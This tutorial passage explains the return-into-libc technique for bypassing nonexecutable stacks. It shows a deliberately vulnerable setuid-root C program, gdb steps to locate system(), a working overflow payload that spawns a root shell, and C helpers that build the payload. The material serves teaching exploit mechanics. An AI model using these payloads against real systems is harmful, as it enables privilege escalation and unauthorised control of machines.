Most applications never need to execute anything on the stack, so an obvious defense against buffer overflow exploits is to make the stack nonexecutable. When this is done, shellcode inserted anywhere on the stack cannot run, which makes it useless. This type of defense stops the majority of existing exploits, and it is becoming more popular. The latest version of OpenBSD has a nonexecutable stack by default, and a nonexecutable stack is available in Linux through PaX, a kernel patch.
1. ret2libc
Of course, there exists a technique used to bypass this protective countermeasure. This technique is known as returning into libc. libc is a standard C library that contains various basic functions, such as printf() and exit(). These functions are shared, so any program that uses the printf() function directs execution into the appropriate location in libc. An exploit can do the exact same thing and direct a program's execution into a certain function in libc. The functionality of such an exploit is limited by the functions in libc, which is a significant restriction when compared to arbitrary shellcode. However, nothing is ever executed on the stack.
2. Returning into system()
One of the simplest libc functions to return into is system(). As you recall, this function takes a single argument and executes that argument with /bin/sh. Needing only one argument makes it a convenient target. For this example, a simple vulnerable program will be used.
2.1. vuln.c
#include <string.h>

int main(int argc, char *argv[])
{
   char buffer[5];
   strcpy(buffer, argv[1]);   // No bounds check: longer input overflows buffer.
   return 0;
}
Of course, this program must be compiled and setuid root before it's truly vulnerable.
reader@hacking:~/booksrc $ gcc -o vuln vuln.c
reader@hacking:~/booksrc $ sudo chown root ./vuln
reader@hacking:~/booksrc $ sudo chmod u+s ./vuln
reader@hacking:~/booksrc $ ls -l ./vuln
-rwsr-xr-x 1 root reader 6600 2007-09-30 22:43 ./vuln
reader@hacking:~/booksrc $
The general idea is to force the vulnerable program to spawn a shell, without executing anything on the stack, by returning into the libc function system(). If this function is supplied with the argument of /bin/sh, this should spawn a shell.
First, the location of the system() function in libc must be determined. This will be different for every system, but once the location is known, it will remain the same until libc is recompiled. One of the easiest ways to find the location of a libc function is to create a simple dummy program and debug it, like this:
reader@hacking:~/booksrc $ cat > dummy.c
int main()
{ system(); }
reader@hacking:~/booksrc $ gcc -o dummy dummy.c
reader@hacking:~/booksrc $ gdb -q ./dummy
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x804837a
(gdb) run
Starting program: /home/matrix/booksrc/dummy
Breakpoint 1, 0x0804837a in main ()
(gdb) print system
$1 = {<text variable, no debug info>} 0xb7ed0d80 <system>
(gdb) quit
Here, a dummy program is created that uses the system() function. After it's compiled, the binary is opened in a debugger and a breakpoint is set at the beginning. The program is executed, and then the location of the system() function is displayed. In this case, the system() function is located at 0xb7ed0d80.
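As a rough alternative to the debugger session above, a program can ask the dynamic loader for a function's address at run time. The sketch below assumes a dynamically linked program on a system that provides dlopen() and dlsym(); the function name libc_symbol_address is hypothetical, and older glibc versions need -ldl when linking. The result is only useful for an exploit if the target process maps libc at the same address, as the text assumes.

```c
#include <dlfcn.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: returns the run-time address of `name` as seen by
 * the dynamic loader, or 0 if the symbol cannot be found. */
uintptr_t libc_symbol_address(const char *name)
{
    /* A NULL filename yields a handle for the main program; lookups
     * through it also search the shared libraries loaded at startup,
     * which normally includes libc. */
    void *handle = dlopen(NULL, RTLD_LAZY);
    if (handle == NULL)
        return 0;

    void *sym = dlsym(handle, name);
    dlclose(handle);
    return (uintptr_t)sym;
}
```

Calling libc_symbol_address("system") and printing the result in hexadecimal gives a value that can be compared with what gdb reports for the same binary.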
Armed with that knowledge, we can direct program execution into the system() function of libc. However, the goal here is to cause the vulnerable program to execute system("/bin/sh") to provide a shell, so an argument must be supplied. When returning into libc, the return address and function arguments are read off the stack in what should be a familiar format: the return address followed by the arguments. On the stack, the return-into-libc call should look something like this:
| Function address | Return address | Argument 1 | Argument 2 | ... |
Directly after the address of the desired libc function is the address to which execution should return after the libc call. After that, all of the function arguments come in sequence.
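The layout just described can also be written down as a C struct, which makes the offsets explicit. This is only an illustrative sketch for a 32-bit x86 target with a single argument; the struct and field names are hypothetical and do not come from the original program.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical view of the words written over the stack, starting at the
 * saved return address of the vulnerable function (32-bit x86). */
struct ret2libc_frame {
    uint32_t function_addr; /* overwrites the saved return address */
    uint32_t return_addr;   /* where the libc function returns afterward */
    uint32_t arg1;          /* first (and here only) function argument */
};
```

Each field is one 4-byte word, so the return slot sits 4 bytes and the first argument 8 bytes past the overwritten return address.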
In this case, it doesn't really matter where the execution returns to after the libc call, since it will be opening an interactive shell. Therefore, these four bytes can just be a placeholder value of FAKE. There is only one argument, which should be a pointer to the string /bin/sh. This string can be stored anywhere in memory; an environment variable is an excellent candidate. In the output below, the string is prefixed with several spaces. This will act similarly to a NOP sled, providing us with some wiggle room, since system("/bin/sh") is the same as system("     /bin/sh").
reader@hacking:~/booksrc $ export BINSH=" /bin/sh"
reader@hacking:~/booksrc $ ./getenvaddr BINSH ./vuln
BINSH will be at 0xbffffe5b
reader@hacking:~/booksrc $
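The wiggle room provided by the leading spaces can be checked with a small experiment. The sketch below is an assumption-laden illustration, not part of the exploit: the helper name run_from_offset is hypothetical, and it uses the harmless shell command true in place of /bin/sh so that nothing interactive is started.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: runs the command that starts `offset` bytes into
 * `padded`, imitating a pointer that lands somewhere inside the run of
 * leading spaces instead of exactly at the start of the string. */
int run_from_offset(const char *padded, size_t offset)
{
    if (offset > strlen(padded))
        return -1;                   /* pointer would fall outside the string */
    return system(padded + offset);  /* the shell skips leading spaces */
}
```

With a string such as "     true", any offset from 0 through 5 should run the same command; only a pointer that lands past the last space cuts into the command itself.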
So the system() address is 0xb7ed0d80, and the address for the /bin/sh string will be 0xbffffe5b when the program is executed. That means the return address on the stack should be overwritten with a series of addresses, beginning with 0xb7ed0d80, followed by FAKE (since it doesn't matter where execution goes after the system() call), and concluding with 0xbffffe5b.
A quick binary search shows that the return address is probably overwritten by the eighth word of the program input, so seven words of dummy data are used for spacing in the exploit.
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x5')
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x10')
Segmentation fault
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x8')
Segmentation fault
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x7')
Illegal instruction
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x7 . "\x80\x0d\xed\xb7FAKE\x5b\xfe\xff\xbf"')
sh-3.2# whoami
root
sh-3.2#
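The byte string produced by the Perl one-liner can also be assembled in C, which makes the little-endian byte order of each address explicit. This is a minimal sketch under the assumptions of the example (32-bit x86, seven words of padding); the function names put_le32 and build_ret2libc are hypothetical, and the addresses are the ones found on the example system.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Store a 32-bit value in little-endian byte order, as x86 expects. */
static void put_le32(unsigned char *dst, uint32_t value)
{
    dst[0] = (unsigned char)(value & 0xff);
    dst[1] = (unsigned char)((value >> 8) & 0xff);
    dst[2] = (unsigned char)((value >> 16) & 0xff);
    dst[3] = (unsigned char)((value >> 24) & 0xff);
}

/* Hypothetical builder: writes pad_words copies of "ABCD", then the
 * function address, a 4-byte return slot, and one argument pointer.
 * Returns the payload length in bytes, or 0 if `out` is too small. */
size_t build_ret2libc(unsigned char *out, size_t out_size,
                      size_t pad_words, uint32_t func_addr,
                      const char ret_slot[4], uint32_t arg_addr)
{
    size_t pad_len = pad_words * 4;
    size_t total = pad_len + 12;     /* three 4-byte words follow the padding */
    size_t i;

    if (out_size < total)
        return 0;

    for (i = 0; i < pad_words; i++)
        memcpy(out + i * 4, "ABCD", 4);

    put_le32(out + pad_len, func_addr);      /* lands on the return address */
    memcpy(out + pad_len + 4, ret_slot, 4);  /* where the function returns */
    put_le32(out + pad_len + 8, arg_addr);   /* pointer to the command string */
    return total;
}
```

Calling build_ret2libc(buf, sizeof buf, 7, 0xb7ed0d80, "FAKE", 0xbffffe5b) yields the same 40 bytes as the command line above. Passing four real address bytes instead of "FAKE" in ret_slot is one way to choose where execution continues after the call.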
The exploit can be expanded upon by making chained libc calls, if needed. The return address of FAKE used in the example can be changed to direct program execution. Additional libc calls can be made, or execution can be directed into some other useful section in the program's existing instructions.